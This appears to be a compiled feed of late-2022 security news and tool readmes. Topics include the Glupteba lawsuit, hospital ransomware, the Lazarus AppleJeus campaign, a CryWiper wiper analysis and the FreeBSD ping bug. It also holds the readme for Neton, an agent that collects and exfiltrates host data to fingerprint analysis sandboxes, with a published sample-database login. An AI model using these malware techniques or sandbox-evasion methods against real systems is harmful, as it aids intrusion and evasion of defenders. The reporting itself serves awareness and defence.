Ameesh Divatia, CEO of Baffle, Inc., talks about data privacy, data security, cloud security and how a skillset in the middle of that triangle will be your best asset in the years to come. All that, and a little bit of local-focused philanthropy.

– Get your FREE cybersecurity training resources: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

0:00 - Data privacy, data security and cloud security 
2:43 - Ameesh Divatia's start in cybersecurity
7:13 - Founding cybersecurity companies
10:19 - Security innovation
12:41 - Cybersecurity regulatory compliance
17:00 - Transferring skills to data security
21:23 - Cybersecurity interviews and knowledge
25:03 - Data privacy policies 
27:44 - Data privacy requirements
30:22 - Confluence of data privacy, security and cloud
33:32 - Volunteering on a city's technology council
41:02 - What is Baffle?
44:11 - Connect with Divatia 
44:43 - Outro

About Infosec
Infosec believes knowledge is power when fighting cybercrime. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and privacy training to stay cyber-safe at work and home. It’s our mission to equip all organizations and individuals with the know-how and confidence to outsmart cybercrime. Learn more at infosecinstitute.com.

In December 2021, Google filed a civil lawsuit against two Russian men thought to be responsible for operating Glupteba, one of the Internet’s largest and oldest botnets. The defendants, who initially pursued a strategy of counter suing Google for tortious interference in their sprawling cybercrime business, later brazenly offered to dismantle the botnet in exchange for payment from Google. The judge in the case was not amused, found for the plaintiff, and ordered the defendants and their U.S. attorney to pay Google’s legal fees.

A slide from a talk given in Sept. 2022 by Google researcher Luca Nagy. https://www.youtube.com/watch?v=5Gz6_I-wl0E&t=6s

Glupteba is a rootkit that steals passwords and other access credentials, disables security software, and tries to compromise other devices on the victim network — such as Internet routers and media storage servers — for use in relaying spam or other malicious traffic.

Collectively, the tens of thousands of systems infected with Glupteba on any given day feed into a number of major cybercriminal businesses: The botnet’s proprietors sell the credential data they steal, use the botnet to place disruptive ads on the infected computers, and mine cryptocurrencies. Glupteba also rents out infected systems as “proxies,” directing third-party traffic through the infected devices to disguise the origin of the traffic.

In June 2022, KrebsOnSecurity showed how the malware proxy services RSOCKS and AWMProxy were entirely dependent on the Glupteba botnet for fresh proxies, and that the founder of AWMProxy was Dmitry Starovikov — one of the Russian men named in Google’s lawsuit.

Google sued Starovikov and 15 other “John Doe” defendants, alleging violations of the Racketeer Influenced and Corrupt Organizations Act (RICO), the Computer Fraud and Abuse Act, trademark and unfair competition law, and unjust enrichment.

In June, Google and the named defendants agreed that the case would proceed as a nonjury action because Google had withdrawn its claim for damages — seeking only injunctive relief to halt the operations of the botnet.

The defendants, who worked for a Russian firm called “Valtron” that was also named in the lawsuit, told Google that they were interested in settling. The defendants said they could potentially help Google by taking the botnet offline.

Another slide from Google researcher Luca Nagy’s September 2022 talk on Glupteba.

But the court expressed frustration that the defendants were unwilling to consent to a permanent injunction, and at the same time were unable to articulate why an injunction forbidding them from engaging in unlawful activities would pose a problem.

“The Defendants insisted that they were not engaged in criminal activity, and that any alleged activity in which they were engaged was legitimate,” U.S. District Court Judge Denise Cote wrote. “Nevertheless, the Defendants resisted entry of a permanent injunction, asserting that Google’s use of the preliminary injunction had disrupted their normal business operations.”

While the defendants represented that they had the ability to dismantle the Glupteba botnet, when it came time for discovery — the stage in a lawsuit where both parties can compel the production of documents and other information pertinent to their case — the attorney for the defendants told the court his clients had been fired by Valtron in late 2021, and thus no longer had access to their work laptops or the botnet.

The lawyer for the defendants — New York-based cybercrime defense attorney Igor Litvak — told the court he first learned about his clients’ termination from Valtron on May 20, a fact Judge Cote said she found “troubling” given statements he made to the court after that date representing that his clients still had access to the botnet.

The court ultimately suspended the discovery process against Google, saying there was reason to believe the defendants sought discovery only “to learn whether they could circumvent the steps Google has taken to block the malware.”

On September 6, Litvak emailed Google that his clients were willing to discuss settlement.

“The parties held a call on September 8, at which Litvak explained that the Defendants would be willing to provide Google with the private keys for Bitcoin addresses associated with the Glupteba botnet, and that they would promise not to engage in their alleged criminal activity in the future (without any admission of wrongdoing),” the judge wrote.

“In exchange, the Defendants would receive Google’s agreement not to report them to law enforcement, and a payment of $1 million per defendant, plus $110,000 in attorney’s fees,” Judge Cote continued. “The Defendants stated that, although they do not currently have access to the private keys, Valtron would be willing to provide them with the private keys if the case were settled. The Defendants also stated that they believe these keys would help Google shut down the Glupteba botnet.”

Google rejected the defendants’ offer as extortionate, and reported it to law enforcement. Judge Cote also found Litvak was complicit in the defendants’ efforts to mislead the court, and ordered him to join his clients in paying Google’s legal fees.

“It is now clear that the Defendants appeared in this Court not to proceed in good faith to defend against Google’s claims but with the intent to abuse the court system and discovery rules to reap a profit from Google,” Judge Cote wrote.

Litvak has filed a motion to reconsider (PDF), asking the court to vacate the sanctions against him. He said his goal is to get the case back into court.

“The judge was completely wrong to issue sanctions,” Litvak said in an interview with KrebsOnSecurity. “From the beginning of the case, she acted as if she needed to protect Google from something. If the court does not decide to vacate the sanctions, we will have to go to the Second Circuit (Court of Appeals) and get justice there.”

In a statement on the court’s decision, Google said it will have significant ramifications for online crime, and that since its technical and legal attacks on the botnet last year, Google has observed a 78 percent reduction in the number of hosts infected by Glupteba.

“While Glupteba operators have resumed activity on some non-Google platforms and IoT devices, shining a legal spotlight on the group makes it less appealing for other criminal operations to work with them,” reads a blog post from Google’s General Counsel Halimah DeLaine Prado and vice president of engineering Royal Hansen. “And the steps [Google] took last year to disrupt their operations have already had significant impact.”

A report from the Polish computer emergency response team (CERT Orange Polksa) found Glupteba was the biggest malware threat in 2021.

Last Minute Patch Thwarts Pwn2Own Entries

Entering Pwn2Own is a daunting endeavor. The targets selected are often popular, already picked over devices with their inclusion in the event only increasing the amount of security researcher eyes pouring over them. Not only that, but it’s not uncommon for vendors to release last minute patches for the included targets in an effort to thwart researcher findings. This year alone we see that both TP-Link and NETGEAR have released last minute updates to devices included in the event.

Unfortunately, we fell victim to this with regards to a planned submission for the NETGEAR Nighthawk WiFi6 Router (RAX30 AX2400). The patch released by NETGEAR the day before the registration deadline dealt a deathblow to our exploit chain and unfortunately invalidated our submission. A few posts on Twitter and communications with other parties appear to indicate that other contestants were also affected by this last minute patch.

That said, since the patch is publicly available, let’s talk about what changed!

While we aren’t aware of everything patched or changed in this update, we do know which flaw prevented our full exploit chain from working properly. Basically, a network misconfiguration present in versions prior to V1.0.9.90 of the firmware inadvertently allowed unrestricted communication with any services listening via IPv6 on the WAN (internet facing) port of the device. For example, SSH and Telnet are operating on ports 22 and 23 respectively.

Prior to the patch, an attacker could interact with these services from the WAN port. After patching, however, we can see that the appropriate ip6tables rules have been applied to prevent access. Additionally, IPv6 now appears disabled by default on newly configured devices.

We’d also like to point out that — at the time of this writing — the device’s auto-update feature does not appear to recognize that updates are available beyond V1.0.6.74. Any consumers relying on the auto-update or “Check for Updates” mechanisms of these devices are likely to remain vulnerable to this issue and any other issues teased over the coming days of Pwn2Own Toronto 2022.

More details can be found on our security advisory page here. We’ll have more information regarding other discovered issues once the coordinated disclosure process for them has been concluded.

NETGEAR Router Network Misconfiguration was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

A French hospital near Paris canceled operations and transfer some patients due to a cyber attack suffered over the weekend.

France’s health ministry announced that the Hospital Centre of Versailles was hit by a cyber attack over the weekend.

Hospital Centre of Versailles, which includes Andre-Mignot Hospital, Richaud Hospital and the Despagne Retirement Home, canceled operations and transferred some patients due to the cyberattack.

According to the RFI’s website, the computers at the hospital were infected with ransomware, threat actors behind the attack also demanded a ransom.

“The group of hackers behind the attack have demanded a ransom, according to Richard Delepierre, co-chairman of the establishment’s supervisory board on Monday.” reported RFI.

“A ransom, the amount of which I do not know, has been requested but we do not intend to pay it,” assured Delepierre, who is also mayor of Chesnay-Rocquencourt.

The regional health agency (ARS) confirmed that operations at the Andre-Mignot Hospital were canceled, while keeping other services up and running.

Health Minister Francois Braun told AFP that six patients had been transferred from the beginning of the attack evening, three in intensive care and three from the neonatal unit.

The hospital is still facing problems and we account exclude that other patients will be transferred in other structures.

“While the machines were still functioning in the intensive care unit, more people were needed to watch the screens as they were no longer working as part of a network, Braun said.” reported AFP.

The police launched an investigation into attempted extortion, the hospital had also filed a formal complaint Sunday.

In France, the law prohibits public establishments to pay ransoms.

This isn’t the first hacking attempt that hit the French healthcare industry, according to Braun, “the health system suffers daily attacks” and “vast majority of these attempts are prevented”.

In August, the Center Hospitalier Sud Francilien (CHSF), a hospital southeast of Paris, suffered a ransomware attack over the weekend. The attack disrupted the emergency services and surgeries and forced the hospital to refer patients to other structures. According to local media, threat actors demand a $10 million ransom to provide the decryption key to restore encrypted data.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, ransomware)

The post French hospital cancels operations after a ransomware attack appeared first on Security Affairs.

Resecurity has identified a new underground marketplace in the Dark Web oriented towards mobile malware developers and operators.

“In the Box” dark web marketplace is leveraged by cybercriminals to attack over 300 financial institutions (FIs), payment systems, social media and online-retailers in 43 countries

Resecurity, the California-based cybersecurity company protecting major Fortune 500 companies, has identified a new underground marketplace in the Dark Web oriented towards mobile malware developers and operators. The marketplace is known as “InTheBox”, and has been available for cybercriminals in the TOR network from at least the start of May 2020, however since then it has transformed from a cybercriminal service operating privately into the largest marketplace known today for it’s sheer number of unique tools and so called WEB-injects offered for sale. 

Such malicious scenarios are purposely developed by fraudsters and used for online-banking theft and financial fraud. Web-injects are integrated into mobile malware to intercept banking credentials, payment systems, social media and email provider credentials, but it doesn’t end there, these malicious tools also collect other sensitive information such as credit card information, address details, phone and other PII. This trend comes from the “Man in The Browser” (MiTB) attacks and WEB-injects designed for traditional PC-based malware such as Zeus, Gozi and SpyEye. Later, cybercriminals successfully applied the same approach to mobile devices, because modern digital payments are extremely interconnected when it comes to mobile applications used by consumers. 

According to the experts from Resecurity, the identified “In The Box” marketplace may now proudly be called the largest and most significant catalyst for banking theft and fraud involving mobile devices. The significance of findings is highlighted by the quality, quantity and spectrum of the available malicious arsenal. Currently, cybercriminals are offering over 1,849 malicious scenarios for sale, designed for major financial institutions, ecommerce, payment systems, online retailers, and social media companies from over 45 countries including the U.S, the U.K, Canada, Brazil, Colombia, Mexico, Saudi Arabia, Bahrain, Turkey, and Singapore. The supported organizations targeted by cybercriminals include Amazon, PayPal, Citi, Bank of America, Wells Fargo, DBS Bank, etc. During November 2022 the actor arranged a significant update of close to 144 injects and improved their visual design.

The operators behind “IntheBox” marketplace are closely connected to developers of major mobile malware families including Alien, Cerberus, Ermac, Hydra, Octopus (aka “Octo”), Poison, and MetaDroid. Cybercriminals rent mobile malware based on a subscription-based fee ranging from $2,500 – $7000 and in some cases task underground vendors to develop purposely designed injects for particular services or applications to ensure successful credential theft on mobile devices. Such malicious scenarios are designed identically to their legitimate counterpart applications but contain fake forms which intercept the logins and passwords of the victim. In addition to that, the mobile malware enables criminals to intercept 2FA code sent via SMS by the bank or to redirect an incoming call containing verification details. As the years pass, the malware market for mobile banking has become extremely mature, and most Dark Web actors stopped selling it, they’ve switched over to potentially renting, or to privately using it.

Every year, the number of mobile-oriented malware increases exponentially. According to independent studies, almost every 1 in 5 users on mobile devices may be compromised with mobile malware. The bad actors leverage smart tactics to bypass anti-fraud filters and conduct banking theft confirming all verification codes without looking suspicious – using amounts above limits and sending them in parts. The amount of typical banking theft varies between $5,000 – $15,000 per consumer and $50,000 – $250,000 per enterprise depending on the size and business activity. In total, the loss from fraud exceeds 5,6 billion USD in 2022. In combination with other types of fraud such as business email compromisation, money laundering and investment scams that create a huge shadow economy with trillions of dollars circulating in the underground.

“The cybercriminals are focusing on mobile devices more than ever, because modern digital payments are impossible without them. Successful disruption of mobile malware networks and associated cybercriminal services is crucial for protecting financial institutions and consumers around the world” – said Christian Lees, Chief Technology Officer (CTO) of Resecurity. “With the rapid growth of fraudulent activity in our post-pandemic world, bad actors continue to upgrade their tooling arsenal to attack customers of major financial institutions (FIs), e-commerce platforms and online marketplaces allowing them to benefit from the upcoming Christmas and New Year’s holidays. According to collected statistics in Q4 2022 by Resecurity®, Digital Forensics & Incident Response (DFIR) engagements conducted on Fortune 500 companies from multiple regions including North America, APAC, LATAM and Middle East & North Africa (MENA). Cybercriminals are especially successful when attacking mobile devices and leveraging gained access for further unauthorized access and financial theft.” – he added. 

The catalyst behind mobile banking malware distribution was uncovered by Resecurity’s HUNTER unit, who investigate cybercrime activities by hunting the actors behind it in close collaboration with international law enforcement agencies and industry partners. 

The intelligence behind the architecture, ecosystem, profiles of actors and acquired malicious scenarios have been shared with FS-ISAC and Google Security Team so the defenders can develop signatures and tactics to properly protect mobile users. The majority of mobile malware supported by “InTheBox” is oriented towards devices using Google Android, that’s why proactive intelligence sharing with the Google Security Team will facilitate enhanced consumer protection, saving millions of USD in light of the upcoming Christmas and Winter Holidays, known as the peak of fraudulent activity because of the increase in online transactions and payments.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, Dark Web)

scscanner is tool to read website status code response from the lists. This tool have ability to filter only spesific status code, and save the result to a file.

Feature

• Slight dependency. This tool only need curl to be installed
• Multi-processing. Scanning will be more faster with multi-processing
• Filter status code. If you want only spesific status code (ex: 200) from the list, this tool will help you

Usage

┌──(miku㉿nakano)-[~/scscanner]
└─$ bash scscanner.sh

scscanner - Massive Status Code Scanner
Codename : EVA02

Example: bash scscanner.sh -l domain.txt -t 30
options:
-l     Files contain lists of domain.
-t     Adjust multi process. Default is 15
-f     Filter status code.
-o     Save to file.
-h     Print this Help.

Adjust multi-process

bash scscanner.sh -l domain.txt -t 30

Using status code filter

bash scscanner.sh -l domain.txt -f 200

Using status code filter and save to file.

bash scscanner.sh -l domain.txt -f 200 -o result.txt

Screenshot

To do List

• Add multi-processing
• Add filter status code options
• Add save to file options
• Get title from page

Feel free to contribute if you want to improve this tools.

A critical stack-based buffer overflow bug, tracked as CVE-2022-23093, in the ping service can allow to take over FreeBSD systems.

The maintainers of the FreeBSD operating system released updates to address a critical flaw, tracked as CVE-2022-23093, in the ping module that could be potentially exploited to gain remote code execution.

The ping utility allows testing the reachability of a remote host using ICMP messages, it requires elevated privileges to use raw sockets. It is available to unprivileged users with the installation of a setuid bit set. This means that when ping runs, it creates the raw socket, and then revokes its elevated privileges.

“ping reads raw IP packets from the network to process responses in the pr_pack() function. As part of processing a response ping has to reconstruct the IP header, the ICMP header and if present a “quoted packet,” which represents the packet that generated an ICMP error. The quoted packet again has an IP header and an ICMP header.” reads the advisory for this issue. “The pr_pack() copies received IP and ICMP headers into stack buffers for further processing. In so doing, it fails to take into account the possible presence of IP option headers following the IP header in either the response or the quoted packet. When IP options are present, pr_pack() overflows the destination buffer by up to 40 bytes.”

A remote attacker can trigger the vulnerability, causing the ping program to crash and potentially leading to remote code execution in ping.

“The ping process runs in a capability mode sandbox on all affected versions of FreeBSD and is thus very constrainted in how it can interact with the rest of the system at the point where the bug can occur.” continues the advisory.

Researchers are recommended to upgrade vulnerable systems to a supported FreeBSD stable or release / security branch (releng) dated after the correction date.

The maintainers of the FreeBSD operating system pointed out that there is no workaround is available.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, CVE-2022-23093)

The post Critical Ping bug potentially allows remote hack of FreeBSD systems appeared first on Security Affairs.

The North Korea-linked Lazarus APT spreads fake cryptocurrency apps under the fake brand BloxHolder to install the AppleJeus malware.

Volexity researchers warn of a new malware campaign conducted by the North Korea-linked Lazarus APT against cryptocurrency users. The threat actors were observed spreading fake cryptocurrency apps under the fake brand BloxHolder to deliver the AppleJeus malware for initial access to networks and steal crypto assets.

The APT group employed the AppleJeus malware since at least 2018 to steal cryptocurrencies from the victims.

The new campaign observed by Volexity started in June 2022, the APT group registered the domain name bloxholder[.]com, and then set up a website related to automated cryptocurrency trading.

The new campaign attributed to Lazarus started in June 2022 and was active until at least October 2022.

In this campaign, the threat actors used the “bloxholder[.]com” domain, a clone of the HaasOnline automated cryptocurrency trading platform.

The website is a clone of the legitimate website, HaasOnline (haasonline[.]com.)

The attackers used the website to distribute a Windows MSI installer masquerading as the BloxHolder app, which was used to install AppleJeus malware along with the QTBitcoinTrader app.

“This discovered file, the  “BloxHolder application”, is actually another case of AppleJeus being installed alongside the open-source cryptocurrency trading application QTBitcoinTrader that is available on GitHub. This same legitimate application has previously been used by the Lazarus Group, as documented in this report from CISA.” reads the report published by Volexity. “The MSI file is used to install both the malicious and legitimate applications at the same time.”

In October 2022, the researchers observed the Lazarus Group installing AppleJeus using a weaponized Microsoft Office document, named ‘OKX Binance & Huobi VIP fee comparision.xls,’ instead of an MSI installer.

The document contains a macro split into two parts, the first one is used to decode a base64 blob that contains a second OLE object containing a second macro. The initial document also stores several variables, encoded using base64, that allow defining where the malware will be deployed in the infected system.

The last stage payload is downloaded from a public file-sharing service, OpenDrive. 

Volexity experts were not able to retrieve the final payload employed since October, but they noticed similarities in the DLL sideloading mechanism which is similar to the one used in the attacks relying on MSI installer.

“While the file was no longer available at the time of analysis, based on public sandbox results for the file in question, the downloaded payload, “Background.png”, embeds the following three files:

• “Logagent.exe” – a legitimate file (md5: eb1e19613a6a260ddd0ae9224178355b)
• “wsock32.dll” – a side-loaded library internally named HijackingLib.dll (md5: e66bc1e91f1a214d098cf44ddb1ae91a)
• “56762eb9-411c-4842-9530-9922c46ba2da” – an encoded payload decoded by “wsock32.dll”

“continues the analysis. “The three files are dropped on disk using hardcoded offsets that can be found in the second macro.”

Experts speculate Lazarus used DLL sideloading to avoid malware analysis, the threat actors also noticed that recent AppleJeus samples obfuscated strings and API calls using a custom algorithm.

“The Lazarus Group continues its effort to target cryptocurrency users, despite ongoing attention to their campaigns and tactics. Perhaps in an attempt to allude detection, they have decided to use chained DLL side-loading to load their payload. Additionally, Volexity has not previously noted the use of Microsoft Office documents to deploy AppleJeus variants.” concludes volexity. “Despite these changes, their targets remain the same, with the cryptocurrency industry being a focus as a means for the DPRK to bolster their finances.”

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, APT)

The post Lazarus APT uses fake cryptocurrency apps to spread AppleJeus Malware appeared first on Security Affairs.

Law enforcement agencies can extract data from the infotainment systems of thousands of different car models.

Data managed by infotainment systems in modern vehicles are a valuable source of information for the investigation of law enforcement agencies.

Modern vehicles come with sophisticated infotainment systems that are connected online and that could represent an entry point for attackers, as demonstrated by many security experts over the years.

Law enforcement and intelligence worldwide are buying technologies that exploit weaknesses in vehicle systems.

Recently security the security expert researcher Sam Curry warned of vulnerabilities in mobile apps that exposed Hyundai and Genesis car models after 2012 to remote attacks. An attacker could exploit these flaws to unlock and start the vehicles.

The experts also exploited these flaws in attacks targeting the SiriusXM “smart vehicle” platform used by several car makers, including Toyota, Honda, FCA, Nissan, Acura, and Infinity.

An attacker only needs to know the car’s identifying number, known as a VIN, to launch the attack against a target vehicle.

Vulnerabilities in infotainment systems can be generally exploited by remote attackers to lock/unlock a vehicle, interact with several features of the cars (hooking up to drivers’ connected devices), and locate them.

According to a report published by Forbes, federal law enforcement agencies, with immigration and border cops are using technologies that can exploit similar weaknesses to extract data from 10,000 different car models.

“The ability to gather piles of evidence on a potential crime from an automobile—sometimes more than can be obtained from a smartphone and often less well secured—is something that immigration and border cops have increasingly latched on to in 2022.” Forbes reports. “Court documents and government contracting records show the agencies tasked with monitoring the Mexican border have spent record sums on car hacking tools, while talking up the extraordinary amount of valuable evidence that can be reaped from onboard computers.”

Privacy advocates are raising the alarm on surveillance activities operated by law enforcement by collecting data from connected systems in modern cars.

“New cars are surveillance on wheels, sending sensitive passenger data to carmakers and police. Cars also store enormous amounts of passenger data onboard, where police can extract it using specialized tools. We estimate that law enforcement agencies could have accessed car data hundreds of thousands of times in 2020.” warned a report published by Surveillance Technology Oversight Project (S.T.O.P.). “Constitutional loopholes allow access to most data on cars without a warrant. Police can access information from car-connected phones and online accounts without the warrant typically required.”

Forbes reported the case of a recent search of a 2019 Dodge Charger, “used to facilitate the transportation or movement of noncitizens without legal status into and throughout the United States” near, the Mexican border. The police was able to access the infotainment system of the vehicle to obtain a broad range of information, including the suspect’s location, user passwords, email addresses, IP addresses and phone numbers.

Forbes also reports another case related to an investigation conducted by the Bureau of Alcohol, Tobacco, Firearms and Explosives (ATF) in Missouri in October. In that case, the law enforcement body used the car hacking technology to gather information from a 2022 Ford F-150.

The ATF investigator pointed out that connected systems in modern vehicles can be targeted to recover a vast amount of data and also spy on a phone connected to the car without access to the phone itself.

ATF confirmed that digital technologies can be used to target over 10000 different vehicle models.

“There are over 10,000 supported vehicles by BMW, Buick, Cadillac, Chevrolet, Chrysler, Dodge, Fiat, Ford, GMC, Hummer, Jeep, Lincoln, Maserati, Mercedes, Mercury, Pontiac, Ram, Saturn, Toyota and Volkswagen,” ATF wrote.

Forbes reported that Customs and Border Protection and Immigration Customs Enforcement have this year spent record sums on car forensics technologies provided by vehicle forensics firm Berla.

The company provides a collection of tools named iVe that supports investigators throughout the entire vehicle forensics process, it includes a mobile application for identifying vehicles, a hardware kit for acquiring systems, and forensic software for analyzing data.

“According to government contract records, in August CBP spent over $380,000 on iVe, nearly eight times its previous single biggest purchase of $50,000 from 2020. ICE, which has been buying Berla’s tools and trainings since 2010, spent $500,000 on iVe in September, well over twice its previous record of $200,000. In a May 2022 contract, CBP specifically asked for “vehicle infotainment forensic extraction tools, licenses, and training” from Berla.” continues Forbes.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, infotainment systems)

The post Law enforcement agencies can extract data from thousands of cars’ infotainment systems appeared first on Security Affairs.

US DHS Cyber Safety Review Board will review attacks linked to the Lapsus$ extortion gang that hit multiple high-profile companies.

The Department of Homeland Security (DHS) Cyber Safety Review Board announced that it will review cyberattacks linked to the extortion gang Lapsus$, the gang breached multiple high-profile companies in recent years.

“Today, the U.S. Department of Homeland Security (DHS) announced that the Cyber Safety Review Board (CSRB) will review the recent attacks associated with Lapsus$, a global extortion-focused hacker group. Lapsus$ has reportedly employed techniques to bypass a range of commonly-used security controls and has successfully infiltrated a number of companies across industries and geographic areas.” reads the CSRB announcement.

The review aims at developing a set of actionable recommendations for how organizations can improve their resilience to these types of attacks. The final report will be transmitted to President Biden through Secretary of Homeland Security Alejandro N. Mayorkas and CISA Director Jen Easterly. 

The Lapsus$ group is behind a long string of attacks against high-profile organizations, including NVIDIA, Samsung, Ubisoft, Mercado Libre, Vodafone, Microsoft, Okta, and Globant.

“The Cyber Safety Review Board has quickly established itself as an innovative and enduring institution in the cybersecurity ecosystem,” said Secretary Alejandro N. Mayorkas. “With its review into Lapsus$, the Board will build on the lessons learned from its first review and share actionable recommendations to help the private and public sectors strengthen their cyber resilience.” 

As directed by President Biden through Executive Order 14028 Improving the Nation’s Cybersecurity, Secretary Mayorkas established t

The CSRB was established on February 2022 under the direct order of President Biden through Executive Order 14028 with the intent of improving the Nation’s Cybersecurity.

The group of experts is tasked with reviewing and assessing significant cybersecurity events to allow public and private organizations to better protect US networks and infrastructure.

“The CSRB is composed of highly esteemed cybersecurity leaders from the federal government and the private sector. The CSRB does not have regulatory powers and is not an enforcement authority. Instead, its purpose is to identify and share lessons learned to enable advances in national cybersecurity. Robert Silvers, DHS Under Secretary for Policy, serves as Chair and Heather Adkins, Google’s Vice President for Security Engineering, serves as Deputy Chair.” continues the announcement.

Some alleged Lapsus$ members have already been arrested by international authorities in the last months.

In October, the Federal Police of Brazil announced the arrest of an individual suspected of being linked to the LAPSUS$ extortionist gang. The authorities did not disclose info about the individual, it seems that the suspect is a teenager.

The arrest is the result of an international police operation codenamed Operation Dark Cloud that was launched in August 2022.

The Brazilian police, the Polícia Federal, launched its investigation in December 2021 after the website of Brazil’s Ministry of Health suffered a data breach. Threat actors stole 50TB of data and deleted COVID-19 vaccination data of millions of Brazilian citizens.

The Lapsus$ gang claimed responsibility for the attack, the group also hit other federal government websites, including the Ministry of Economy, Comptroller General of the Union, and the Federal Highway Police.

In September, the City of London Police arrested a 17-year-old teenager on suspicion of hacking, however, experts believe the arrest could be linked to the recent security breaches suffered by Uber and Rockstar Games.

Uber revealed that the threat actor behind the intrusion is affiliated with the LAPSUS$ hacking group.

The threat actor behind the Uber hack, which goes online by the moniker Tea Pot (aka teapotuberhacker), also claimed to have Rockstar Games, the gaming firm behind GTA 6.

The arrest is the result of a joint investigation conducted by City of London Police with the U.K. National Crime Agency’s cybercrime unit.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, cybercrime)

Neton is a tool for getting information from Internet connected sandboxes. It is composed by an agent and a web interface that displays the collected information.
The Neton agent gets information from the systems on which it runs and exfiltrates it via HTTPS to the web server.

Some of the information it collects:

• Operating system and hardware information
• Find files on mounted drives
• List unsigned microsoft drivers
• Run SharpEDRChecker
• Run Pafish
• Run Al-Khaser
• Detect hooks
• Take screenshots of the desktop

All this information can be used to improve Red Team artifacts or to learn how sandboxes work and improve them.

Images

Deployment

NetonWeb

1. Install (with virtualenv):

python3 -m venv venv
source venv/bin/activate
pip3 install -r requirements.txt

2. Configure the database:

python3 manage.py migrate
python3 manage.py makemigrations core
python3 manage.py migrate core

• Create user:

python3 manage.py createsuperuser

Launch (test)

python3 manage.py runserver

Launch (prod)

• Generate the certificates and store them in the certs folder:

openssl req -newkey rsa:2048 -new -nodes -x509 -days 3650 -keyout server.key -out server.crt

Launch gunicorn:

./launch_prod.sh

Agent

Build solution with Visual Studio. The agent configuration can be done from the Program.cs class.

• url variable: Url where the information will be exfiltrated (NetonWeb's).
• sandboxId variable: Identifier of the sandbox where the samples are uploaded.
• wave variable: Way of organising the different times the samples are sent. muestras.

Sample data

In the sample data folder there is a sqlite database with several samples collected from the following services:

• Virustotal
• Tria.ge
• Metadefender
• Hybrid Analysis
• Any.run
• Intezer Analyze
• Pikker
• AlienVault OTX
• Threat.Zone

To access the sample information copy the sqlite file to the NetonWeb folder and run the application.

Credentials:

• User: raccoon
• Password: jAmb.Abj3.j11pmMa

Extra info

• Slides (ES): https://github.com/Aetsu/Presentaciones/blob/master/Sandbox%20fingerprinting%20-%20Evadiendo%20entornos%20de%20analisis.pdf
• Video (ES): https://www.youtube.com/watch?v=AyVgIttiUpQ
• Video (EN): https://www.youtube.com/watch?v=KzwEddl80OQ

Credits

• SharpEDRChecker: https://github.com/PwnDexter/SharpEDRChecker
• Pafish: https://github.com/a0rtega/pafish
• Al-Khaser: https://github.com/LordNoteworthy/al-khaser
• OffensiveCSharp -> HookDetector: https://github.com/matterpreter/OffensiveCSharp/tree/master/HookDetector
• OffensiveCSharp -> DriverQuery: https://github.com/matterpreter/OffensiveCSharp/tree/master/DriverQuery

Experts spotted a new data wiper, dubbed CryWiper, that was employed in destructive attacks against Russian mayor’s offices and courts.

Researchers from Kaspersky discovered a previously unknown data wiper, dubbed CryWiper, that was employed in destructive attacks against Russian mayor’s offices and courts.

The malware masquerades as ransomware, but the analysis of the code demonstrates that it does not actually encrypt, but only destroys data in the infected system. 

According to Kaspersky, the wiper was first spotted in the fall of 2022 when it was employed in an attack against an organization’s network in the Russian Federation.

“After examining a sample of malware, we found out that this Trojan, although it masquerades as a ransomware and extorts money from the victim for “decrypting” data, does not actually encrypt, but purposefully destroys data in the affected system.” reads the report published by Kaspersky. “Moreover, an analysis of the Trojan’s program code showed that this was not a developer’s mistake, but his original intention.”

The CryWiper sample analyzed by the researchers is a Windows 64-bit executable that was written in C++ and compiled using the MinGW-w64 toolkit and the GCC compiler. The experts pointed out that this development process for C/C++ malware developers for Windows is unusual.

The experts believe the malware was specifically designed to target Windows systems because it uses many calls to WinAPI functions.

Once executed, CryWiper uses the Task Scheduler and the schtasks create command to create a task to run its file every 5 minutes.

The the wiper contacts the command and control server using an HTTP GET request and passes the name of the infected system as a parameter.

The C2 in turn responds with either a “run” or “do not run” command, in order to determine if the malware have to start.

In some cases, the researchers observed execution delays of 4 days (345,600 seconds) to hide the logic behind the infection.

Upon receiving a run response, CryWiper stops processes related to MySQL and MS SQL database servers, MS Exchange mail server and MS Active Directory web services using the taskkill command. This action unlocks files used by the above legitimate applications before encrypting them.

CryWiper will stop critical processes related to MySQL, MS SQL database servers, MS Exchange email servers, and MS Active Directory web services to free locked data for destruction.

The wiper also deletes shadow copies on the compromised machine to prevent victims from restoring the wiped files.

The malware also changes the HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections registry setting to prevent RDP connections to the infected system. 

In order to destroy user files, the wiper generates a sequence of data using the pseudo-random number generator “Mersenne Vortex” overwrite the original file content.

The malware appends the .CRY extension to the files it has corrupted and drops ransom notes (‘README.txt’) demanding for 0.5 Bitcoin for the decrypted.

“CryWiper positions itself as a ransomware program, that is, it claims that the victim’s files are encrypted and, if a ransom is paid, they can be restored. However, this is a hoax: in fact, the data has been destroyed and cannot be returned. The activity of CryWiper once again shows that the payment of the ransom does not guarantee the recovery of files.” concludes the report.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, CryWiper)

The post New CryWiper wiper targets Russian entities masquerading as a ransomware appeared first on Security Affairs.

A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box.

If you want to also receive for free the newsletter with the international press subscribe here.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, newsletter)

Today I’m happy to announce the next COM Programming class to be held in February 2023. The syllabus for the 3 day class can be found here. The course will be delivered in 6 half-days (4 hours each).

Dates: February (7, 8, 9, 14, 15, 16).
Times: 11am to 3pm EST (8am to 12pm PST) (4pm to 8pm UT)
Cost: 750 USD (if paid by an individual), 1400 USD (if paid by a company).

Half days should make it comfortable enough even if you’re not in an ideal time zone.

